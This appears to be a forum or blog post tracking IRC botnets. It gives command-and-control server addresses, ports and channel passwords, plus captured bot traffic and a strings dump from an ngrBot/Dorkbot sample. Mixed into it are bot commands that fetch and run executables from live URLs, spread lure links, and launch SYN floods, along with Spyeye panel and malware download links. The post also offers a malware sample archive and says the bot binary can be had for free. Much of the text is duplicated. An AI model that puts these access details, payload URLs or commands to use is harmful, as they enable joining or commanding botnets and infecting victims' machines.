Remote Host Port Number
88.86.113.239 31092
NICK US|computername
USER siruyuse UNIX UNIX :username
JOIN #global#
JOIN #US
Now talking in #global#
Topic On: [ #global# ] [ omtECZWQgee3/7w9aGStOwmHmYQVTJXFx68dXRhkVWUhNomgeVieycdUnnRaoait ]
Modes On: [ #global# ] [ +smntMu ]
hosting infos:
http://whois.domaintools.com/88.86.113.239
Hackforums.net Investigation
We are working to get Hackforums.net shut down. We feel strongly that it a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.
I'm not certain of what your criteria if for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.
Hackforums.net - "Infecting one another with malware."
We are reporting this site for illegal activitie and it should be closed as soon as posible!
Legal internet law will clean all illegal activities and we will help realise it!
[IT Security Team]
We are working to get Hackforums.net shut down. We feel strongly that it a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.
I'm not certain of what your criteria if for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.
Hackforums.net - "Infecting one another with malware."
We are reporting this site for illegal activitie and it should be closed as soon as posible!
Legal internet law will clean all illegal activities and we will help realise it!
[IT Security Team]
117.211.84.155(irc botnet hosted in India Bangalore O/o Dgm Bb Noc Bsnl Bangalore)
Remote Host Port Number
117.211.84.155 25343 PASS scary
NICK [USA|XP|XmWCMYN5]
USER 9583 "" "lol" :9583
NICK [USA|XP|UFdwiY47]
USER 4508 "" "lol" :4508
NICK [USA|XP|YZw7cS8u]
USER 2152 "" "lol" :2152
NICK [USA|XP|X2XUcWQU]
NICK [USA|XP|cuCVirAD]
USER 6242 "" "lol" :6242
NICK [USA|XP|bx3Iivi3]
USER 8840 "" "lol" :8840
NICK [USA|XP|fRQNcpmq]
USER 6294 "" "lol" :6294
hosting infos
http://whois.domaintools.com/117.211.84.155
117.211.84.155 25343 PASS scary
NICK [USA|XP|XmWCMYN5]
USER 9583 "" "lol" :9583
NICK [USA|XP|UFdwiY47]
USER 4508 "" "lol" :4508
NICK [USA|XP|YZw7cS8u]
USER 2152 "" "lol" :2152
NICK [USA|XP|X2XUcWQU]
NICK [USA|XP|cuCVirAD]
USER 6242 "" "lol" :6242
NICK [USA|XP|bx3Iivi3]
USER 8840 "" "lol" :8840
NICK [USA|XP|fRQNcpmq]
USER 6294 "" "lol" :6294
hosting infos
http://whois.domaintools.com/117.211.84.155
204.15.252.199(irc botnet hosted in United States Henderson Trashy Media)
UPDATE:
204.15.252.199:4042
Irc Trafic:
NICK new[BEL|XP|Pig-D17A7D27]dvxotgy
USER hh "" "lol" :hh
Now talking in #newbiz#
Topic On: [ #newbiz# ] [ .down /99/106/112/81/55/59/40/125/111/122/35/108/114/121/114/116/115/106/104/122/126/121/37/69/76/117/48/113/107/125/118/126/47/108/116/84/47/102/113/71/ ]
Topic By: [ b ]
Topic: b sets topic []
hosting infos:
http://whois.domaintools.com/204.15.252.199
204.15.252.199:4042
Irc Trafic:
NICK new[BEL|XP|Pig-D17A7D27]dvxotgy
USER hh "" "lol" :hh
Now talking in #newbiz#
Topic On: [ #newbiz# ] [ .down /99/106/112/81/55/59/40/125/111/122/35/108/114/121/114/116/115/106/104/122/126/121/37/69/76/117/48/113/107/125/118/126/47/108/116/84/47/102/113/71/ ]
Topic By: [ b ]
Topic: b sets topic []
hosting infos:
http://whois.domaintools.com/204.15.252.199
89.238.176.123(irc botnet hosted in United Kingdom M247 Ltd)
Remote Host Port Number
195.122.131.11 80
213.251.170.52 80
64.62.243.91 80
89.238.176.123 4042 IRCD here
Now talking in #newbiz#
Topic On: [ #newbiz# ] [ ]
Topic By: [ b ]
hosting infos:
http://whois.domaintools.com/89.238.176.123
195.122.131.11 80
213.251.170.52 80
64.62.243.91 80
89.238.176.123 4042 IRCD here
Now talking in #newbiz#
Topic On: [ #newbiz# ] [ ]
Topic By: [ b ]
hosting infos:
http://whois.domaintools.com/89.238.176.123
gusan0.sin-ip.es(irc botnet hosted in United States Chicago Fdcservers.net)
Remote Host Port Number
50.7.247.10 6667
NICK NEW[XX][XP]8744609838
USER 8744 "" "TsGh" :8744
MODE NEW[XX][XP]8744609838 -d
JOIN ##spam##
PONG :irc.priv8net.com
NICK {XP\USA\698507}
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XP\USA\698507} -ix
JOIN ##v5##
MODE ##v5## -ix
PRIVMSG ##v5## :.::[DDoS]::. Flooding 127.0.0.2:1234 with ddos.syn for 50 seconds
PRIVMSG ##v5## :.::[DDoS]::. Done with flood (0KB/sec).
NICK {XP\USA\965601}
MODE {XP\USA\965601} -ix
hosting infos:
http://whois.domaintools.com/50.7.247.10
50.7.247.10 6667
NICK NEW[XX][XP]8744609838
USER 8744 "" "TsGh" :8744
MODE NEW[XX][XP]8744609838 -d
JOIN ##spam##
PONG :irc.priv8net.com
NICK {XP\USA\698507}
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XP\USA\698507} -ix
JOIN ##v5##
MODE ##v5## -ix
PRIVMSG ##v5## :.::[DDoS]::. Flooding 127.0.0.2:1234 with ddos.syn for 50 seconds
PRIVMSG ##v5## :.::[DDoS]::. Done with flood (0KB/sec).
NICK {XP\USA\965601}
MODE {XP\USA\965601} -ix
hosting infos:
http://whois.domaintools.com/50.7.247.10
46.17.100.229(irc botnet hosted in Russian Federation Mir Telematiki Ltd)
Remote Host Port Number
46.17.100.229 4443 ircd here
46.28.64.99 444
46.28.64.99 80
79.142.67.113 80
NICK N[USA|XP][vsdyciq]
USER vsdy "" "lol" :vsdy
JOIN #b0ts
PONG 422
PRIVMSG #b0ts :[Download]: Succeeded using primary method [WinInet: 279 KB]
executables:
# http://c0re.us/test.exe
# http://waterforpeople.co.cc/crypted.exe
Spyeye panel:
http://quantummechanic.cc/controlpanel/
Spyeye executable:
http://waterforpeople.co.cc/spyfud.exe.exe
hosting info:
http://whois.domaintools.com/46.17.100.229
46.17.100.229 4443 ircd here
46.28.64.99 444
46.28.64.99 80
79.142.67.113 80
NICK N[USA|XP][vsdyciq]
USER vsdy "" "lol" :vsdy
JOIN #b0ts
PONG 422
PRIVMSG #b0ts :[Download]: Succeeded using primary method [WinInet: 279 KB]
executables:
# http://c0re.us/test.exe
# http://waterforpeople.co.cc/crypted.exe
Spyeye panel:
http://quantummechanic.cc/controlpanel/
Spyeye executable:
http://waterforpeople.co.cc/spyfud.exe.exe
hosting info:
http://whois.domaintools.com/46.17.100.229
213.229.107.27(irc botnet hosted in United Kingdom Canonical Range For Bs2-hp1-le)
Remote Host Port Number
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
85.118.137.12 80
213.229.107.27 1234 PASS xxx
NICK NEW-[USA|00|P|07451]
USER XP-1167 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|07451] -ix
JOIN #!nn! test
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/213.229.107.27
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
85.118.137.12 80
213.229.107.27 1234 PASS xxx
NICK NEW-[USA|00|P|07451]
USER XP-1167 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|07451] -ix
JOIN #!nn! test
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/213.229.107.27
67.210.170.142(irc botnet hosted in Canada Ottawa Network Defence Intelligence Inc)
Remote Host Port Number
67.210.170.142 20000 PASS ohai
NICK cqexck
USER nnlucf "" "ftr" :nnlucf
hosting infos:
http://whois.domaintools.com/67.210.170.142
67.210.170.142 20000 PASS ohai
NICK cqexck
USER nnlucf "" "ftr" :nnlucf
hosting infos:
http://whois.domaintools.com/67.210.170.142
75.102.22.20(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number
75.102.22.20 2345
NICK New[USA|00|P|90973]
USER XP-0539 * 0 :COMPUTERNAME
MODE New[USA|00|P|90973] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/75.102.22.20
75.102.22.20 2345
NICK New[USA|00|P|90973]
USER XP-0539 * 0 :COMPUTERNAME
MODE New[USA|00|P|90973] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/75.102.22.20
64.202.107.28(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number
64.202.107.28 2345
NICK New[USA|00|P|90973]
USER XP-0539 * 0 :COMPUTERNAME
MODE New[USA|00|P|90973] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/64.202.107.28
64.202.107.28 2345
NICK New[USA|00|P|90973]
USER XP-0539 * 0 :COMPUTERNAME
MODE New[USA|00|P|90973] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/64.202.107.28
72.20.14.87(irc botnet hosted in United States Staminus Communications)
Remote Host Port Number
72.20.14.87 38
JOIN #Internet#
hosting infos:
http://whois.domaintools.com/72.20.14.87
72.20.14.87 38
JOIN #Internet#
hosting infos:
http://whois.domaintools.com/72.20.14.87
70.107.249.167(irc botnet hosted in United States New York Verizon Online Llc)
70.107.249.167:3921
Nick: A4-647337362958
Username: fpairedpyoqaak
Joined Channel: #mss2 with Password mss2pass
Channel Topic for Channel #mss2: "xvvv mssql 100 0 0 -a -r -s"
i got this info from Seb another botnet lover lol
hosting infos:
http://whois.domaintools.com/70.107.249.167
Nick: A4-647337362958
Username: fpairedpyoqaak
Joined Channel: #mss2 with Password mss2pass
Channel Topic for Channel #mss2: "xvvv mssql 100 0 0 -a -r -s"
i got this info from Seb another botnet lover lol
hosting infos:
http://whois.domaintools.com/70.107.249.167
smellypussy.info(ngrBot very large irc botnet hosted in United States Henderson Trashy Media)
This botnet is very big one and the bot used for spreading is also special
alot of features inside like injection into multiple system processes,ruskill for killing processes blocking av updates , windows security updates, msn spread,ftp infection etc
Sample vas captured by Xylitol and then i helped for finding more ip's and diferent samples from same botnet
The bot is detected as Dorkbot
Here we go
Analysis from sample:
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
\\.\pipe\%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj
Dns used for the botnet:
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]
Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]
Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]
How to conect to this server:
smellypussy.info:81
heytherebitch.com:81
keshmoney.biz:81
UPDATE:
Remote Host Port Number
204.15.252.199 49287 ircd here
208.75.230.43 80
213.251.170.52 80
61.31.99.67 4042 ircd here
Chanel:
Now talking in #boss
Topic On: [ #boss ] [ !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s ]
Topic By: [ b ] b for bullshit lol
NICK new[USA|XP|COMPUTERNAME]zvbnyex
USER hh "" "lol" :hh
JOIN #newbiz#
PONG 422
Chanel pass:ngrBot
The bin is for sell in underground forums for 400$ but u can have it for free now
alot of features inside like injection into multiple system processes,ruskill for killing processes blocking av updates , windows security updates, msn spread,ftp infection etc
Sample vas captured by Xylitol and then i helped for finding more ip's and diferent samples from same botnet
The bot is detected as Dorkbot
Here we go
Analysis from sample:
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
\\.\pipe\%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj
Dns used for the botnet:
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]
Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]
Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]
How to conect to this server:
smellypussy.info:81
heytherebitch.com:81
keshmoney.biz:81
UPDATE:
Remote Host Port Number
204.15.252.199 49287 ircd here
208.75.230.43 80
213.251.170.52 80
61.31.99.67 4042 ircd here
Chanel:
Now talking in #boss
Topic On: [ #boss ] [ !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s ]
Topic By: [ b ] b for bullshit lol
NICK new[USA|XP|COMPUTERNAME]zvbnyex
USER hh "" "lol" :hh
JOIN #newbiz#
PONG 422
Chanel pass:ngrBot
The bin is for sell in underground forums for 400$ but u can have it for free now
brainbox.dyndns.org(irc botnet hosted in United States Sparta Ispsystem At Nac)
Remote Host Port Number
213.186.33.87 80
82.146.51.173 4598
NICK n[XP-USA]855437
PONG 422
PRIVMSG ##Channel## :
09Executed Process Successfully.
USER 8554 "" "TsGh" :8554
JOIN ##Channel3##
PRIVMSG ##Channel3## :
NICK [XP-USA]561757
USER 5617 "" "TsGh" :5617
JOIN ##Channel##
hosting infos:
http://whois.domaintools.com/82.146.51.173
213.186.33.87 80
82.146.51.173 4598
NICK n[XP-USA]855437
PONG 422
PRIVMSG ##Channel## :
09Executed Process Successfully.
USER 8554 "" "TsGh" :8554
JOIN ##Channel3##
PRIVMSG ##Channel3## :
NICK [XP-USA]561757
USER 5617 "" "TsGh" :5617
JOIN ##Channel##
hosting infos:
http://whois.domaintools.com/82.146.51.173
72.55.132.187(irc botnet hosted in Canada Zenkis.ca)
Remote Host Port Number
213.251.170.52 80
72.55.132.187 2603 PASS ngrBot
78.47.10.199 21
NICK n{US|XPa}hjcbvjl
USER hjcbvjl 0 0 :hjcbvjl
JOIN #phcrulez ngrBot
USER adi
hosting infos:
http://whois.domaintools.com/72.55.132.187
213.251.170.52 80
72.55.132.187 2603 PASS ngrBot
78.47.10.199 21
NICK n{US|XPa}hjcbvjl
USER hjcbvjl 0 0 :hjcbvjl
JOIN #phcrulez ngrBot
USER adi
hosting infos:
http://whois.domaintools.com/72.55.132.187
infected34.co.cc(irc botnet hosted in Germany Berlin Fast It Colocation)
ircd :infected34.co.cc:6667 PASS timu or PASS aliss
NICK [00|USA|989169]
USER XP-6593 * 0 :COMPUTERNAME
MODE [00|USA|989169] -ix
JOIN #N timu
MODE [SI|USA|00|P|79102] -ix
JOIN #test# aliss
PONG 217.79.190.39
NICK [SI|USA|00|P|79102]
USER XP-4584 * 0 :COMPUTERNAME
hosting infos:
http://whois.domaintools.com/217.79.190.39
NICK [00|USA|989169]
USER XP-6593 * 0 :COMPUTERNAME
MODE [00|USA|989169] -ix
JOIN #N timu
MODE [SI|USA|00|P|79102] -ix
JOIN #test# aliss
PONG 217.79.190.39
NICK [SI|USA|00|P|79102]
USER XP-4584 * 0 :COMPUTERNAME
hosting infos:
http://whois.domaintools.com/217.79.190.39
75.102.22.40(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number
195.122.131.8 80
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
66.220.158.11 80
75.102.22.40 2866 PASS xxx
NICK NEW-[USA|00|P|20798]
USER XP-0727 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|20798] -ix
JOIN #!nine! test
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/75.102.22.40
195.122.131.8 80
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
66.220.158.11 80
75.102.22.40 2866 PASS xxx
NICK NEW-[USA|00|P|20798]
USER XP-0727 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|20798] -ix
JOIN #!nine! test
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/75.102.22.40
50mb malware samples
This is another package with diferent malwares
have fun
size=50mb
Download:
http://c65cdb0b.tubeviral.com
have fun
size=50mb
Download:
http://c65cdb0b.tubeviral.com
toxfeenyxx.sdeirc.net(phoenix bot hosted in Cyprus C & C Advanced Online Services Ltd)
Remote Host Port Number
toxfeenyxx.sdeirc.net 3674
NICK N[USA|XP][tjxcvay]
USER tjxc "" "lol" :tjxc
JOIN #phoenix selling9309239
NICK N[USA|XP][baersyl]
USER baer "" "lol" :baer
hosting infos:
http://whois.domaintools.com/46.243.8.142
toxfeenyxx.sdeirc.net 3674
NICK N[USA|XP][tjxcvay]
USER tjxc "" "lol" :tjxc
JOIN #phoenix selling9309239
NICK N[USA|XP][baersyl]
USER baer "" "lol" :baer
hosting infos:
http://whois.domaintools.com/46.243.8.142
homelessman.weedns.com(Mouse's botnet hosted in the whole world lol)
this is prob one of the bigest botnets still alive from years now
dns:homelessman.weedns.com
port:3305
Resolved : [homelessman.weedns.com] To [80.247.72.130]
Resolved : [homelessman.weedns.com] To 13[92.62.231.115]
Resolved : [homelessman.weedns.com] To [202.117.53.21]
Resolved : [homelessman.weedns.com] To [156.26.121.177]
DNS List:
ns.yumetairiku.co.jp:3305
virtual-mgsf.nebula.fi:3305
dell.aurius.sk:3305
cx10man.weedns.com:3305
fx010413.whyI.org:3305
gynoman.weedns.com:3305
c010x1.co.cc:3305
commgr.co.cc:3305
g.0x20.biz:3305
telephone.dd.blueline.be:3305
cx10man.weedns.com:3305
gynoman.weedns.com:3305
www.carpet-backing.com
www.comofil.it
www.iris-spa.it
www.osteriadeltorchio.it
ballslessman.weedns.com:3305
fx010413.whyi.org:3305
hr.whyi.org:3305
hikemanplace.weedns.com:3305
opmanplace.weedns.com:3305
www.usderviese.it
NICK P|hy4m13g8c
USER kv7ucu7y9 * 0 :USA|XP|601
USERHOST P|hy4m13g8c
MODE P|hy4m13g8c
JOIN #mm RSA
PRIVMSG #mm :+Cpiwe/Bec9E07RQ/c0vtb4S//EdYX/xXUDj093Z0X0JV7.c0puSW4.pimDm1LRefR1ZyBMf0vZEvo.KMXSW1c0M3m/Fwv310uA.y6/SUz0u/OGWL5.gwJqI.6pkc9.kty0t0KWEjq.nHZN20/qQ08.asyjW/qqA8J1QcT5G1
dns:homelessman.weedns.com
port:3305
Resolved : [homelessman.weedns.com] To [80.247.72.130]
Resolved : [homelessman.weedns.com] To 13[92.62.231.115]
Resolved : [homelessman.weedns.com] To [202.117.53.21]
Resolved : [homelessman.weedns.com] To [156.26.121.177]
DNS List:
ns.yumetairiku.co.jp:3305
virtual-mgsf.nebula.fi:3305
dell.aurius.sk:3305
cx10man.weedns.com:3305
fx010413.whyI.org:3305
gynoman.weedns.com:3305
c010x1.co.cc:3305
commgr.co.cc:3305
g.0x20.biz:3305
telephone.dd.blueline.be:3305
cx10man.weedns.com:3305
gynoman.weedns.com:3305
www.carpet-backing.com
www.comofil.it
www.iris-spa.it
www.osteriadeltorchio.it
ballslessman.weedns.com:3305
fx010413.whyi.org:3305
hr.whyi.org:3305
hikemanplace.weedns.com:3305
opmanplace.weedns.com:3305
www.usderviese.it
NICK P|hy4m13g8c
USER kv7ucu7y9 * 0 :USA|XP|601
USERHOST P|hy4m13g8c
MODE P|hy4m13g8c
JOIN #mm RSA
PRIVMSG #mm :+Cpiwe/Bec9E07RQ/c0vtb4S//EdYX/xXUDj093Z0X0JV7.c0puSW4.pimDm1LRefR1ZyBMf0vZEvo.KMXSW1c0M3m/Fwv310uA.y6/SUz0u/OGWL5.gwJqI.6pkc9.kty0t0KWEjq.nHZN20/qQ08.asyjW/qqA8J1QcT5G1
ashland.aboutkiddies.com(irc botnet hosted in United States New York Webair Internet Development Company Inc)
Remote Host Port Number
209.200.50.75 3800 PASS hax0r
213.251.170.52 80
91.200.241.40 80
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://91.200.241.40/dq.exe
PRIVMSG #dpi :[d="http://91.200.241.40/dq.exe" s="23552 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PASS hax0r..KCIK
00000010 | 206E 7B55 537C 5850 617D 6D69 696D 6567 | n{US|XPa}miimeg
00000020 | 740D 0A52 5353 5220 6D69 696D 6567 7420 | t..RSSR miimegt
00000030 | 3020 3020 3A6D 6969 6D65 6774 0D0A 5345 | 0 0 :miimegt..SE
00000040 | 4E44 2023 6E67 206E 6730 300D 0A | ND #ng ng00..
hosting infos:
http://whois.domaintools.com/209.200.50.75
209.200.50.75 3800 PASS hax0r
213.251.170.52 80
91.200.241.40 80
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://91.200.241.40/dq.exe
PRIVMSG #dpi :[d="http://91.200.241.40/dq.exe" s="23552 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PASS hax0r..KCIK
00000010 | 206E 7B55 537C 5850 617D 6D69 696D 6567 | n{US|XPa}miimeg
00000020 | 740D 0A52 5353 5220 6D69 696D 6567 7420 | t..RSSR miimegt
00000030 | 3020 3020 3A6D 6969 6D65 6774 0D0A 5345 | 0 0 :miimegt..SE
00000040 | 4E44 2023 6E67 206E 6730 300D 0A | ND #ng ng00..
hosting infos:
http://whois.domaintools.com/209.200.50.75
46.243.8.119(irc botnet hosted in Cyprus C & C Advanced Online Services Ltd)
Remote Host Port Number
ircserver.taylor412gang.com 3941
NICK N[USA|XP][qhfpagj]
USER qhfp "" "lol" :qhfp
JOIN #apple apple57
hosting infos:
http://whois.domaintools.com/46.243.8.119
ircserver.taylor412gang.com 3941
NICK N[USA|XP][qhfpagj]
USER qhfp "" "lol" :qhfp
JOIN #apple apple57
hosting infos:
http://whois.domaintools.com/46.243.8.119
01.cybernix.info(irc botnet hosted in United States Willowbrook Psinet Inc)
Remote Host Port Number
01.cybernix.info 1750 PASS gsaxx00
NICK \00\USA\9j6m6dbn0n
USER XP-SP2 x x :COMPUTERNAME
JOIN ##pool P00L
NICK \00\USA\iky784di69
hosting infos:
http://whois.domaintools.com/154.35.64.32
01.cybernix.info 1750 PASS gsaxx00
NICK \00\USA\9j6m6dbn0n
USER XP-SP2 x x :COMPUTERNAME
JOIN ##pool P00L
NICK \00\USA\iky784di69
hosting infos:
http://whois.domaintools.com/154.35.64.32
95.173.179.231(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
Remote Host Port Number
95.173.179.231 6667 PASS codr00t
MODE [USA|XP|094124] -ix
JOIN #k codr00t
PRIVMSG #k :[p2p]: Spreading to p2p folders.
PONG HTTP1.4
NICK [USA|XP|094124]
USER xfgbxix * 0 :COMPUTERNAME
hosting infos:
http://whois.domaintools.com/95.173.179.231
95.173.179.231 6667 PASS codr00t
MODE [USA|XP|094124] -ix
JOIN #k codr00t
PRIVMSG #k :[p2p]: Spreading to p2p folders.
PONG HTTP1.4
NICK [USA|XP|094124]
USER xfgbxix * 0 :COMPUTERNAME
hosting infos:
http://whois.domaintools.com/95.173.179.231
main.xxxxxiseviumixxxxx.info(irc botnet hosted in Germany Berlin Active Media)
Remote Host Port Number
jky.no-ip.info 3177 RAT here
main.xxxxxiseviumixxxxx.info 3211 IRCD here
NICK Sapphire{USA|XP-SP2}0300311
USER 03003114 "" "03003114" :03003114
MODE Sapphire{USA|XP-SP2}0300311
JOIN #Sapphire_2#
NICK New{USA|XP-SP2}1046453
USER 10464537 "" "10464537" :10464537
MODE New{USA|XP-SP2}1046453
hosting infos:
http://whois.domaintools.com/88.198.219.113
jky.no-ip.info 3177 RAT here
main.xxxxxiseviumixxxxx.info 3211 IRCD here
NICK Sapphire{USA|XP-SP2}0300311
USER 03003114 "" "03003114" :03003114
MODE Sapphire{USA|XP-SP2}0300311
JOIN #Sapphire_2#
NICK New{USA|XP-SP2}1046453
USER 10464537 "" "10464537" :10464537
MODE New{USA|XP-SP2}1046453
hosting infos:
http://whois.domaintools.com/88.198.219.113
yesim.hoodrich.ru(irc botnet hosted in United States South Lake Tahoe Reliablehosting.com - Network Services)
Remote Host Port Number
yesim.hoodrich.ru:4042
Resolved : [yesim.hoodrich.ru] To [216.131.127.13]
216.131.127.13 4042
89.201.164.126 80
NICK new[USA|XP|COMPUTERNAME]pethrmn
USER xD "" "lol" :xD
JOIN #biznew#
PONG 422
PONG :irc.priv8net4.com
* The data identified by the following URL was then requested from the remote web server:
o http://epicbookings.com/images/jun16.exe
hosting infos:
http://whois.domaintools.com/216.131.127.13
yesim.hoodrich.ru:4042
Resolved : [yesim.hoodrich.ru] To [216.131.127.13]
216.131.127.13 4042
89.201.164.126 80
NICK new[USA|XP|COMPUTERNAME]pethrmn
USER xD "" "lol" :xD
JOIN #biznew#
PONG 422
PONG :irc.priv8net4.com
* The data identified by the following URL was then requested from the remote web server:
o http://epicbookings.com/images/jun16.exe
hosting infos:
http://whois.domaintools.com/216.131.127.13
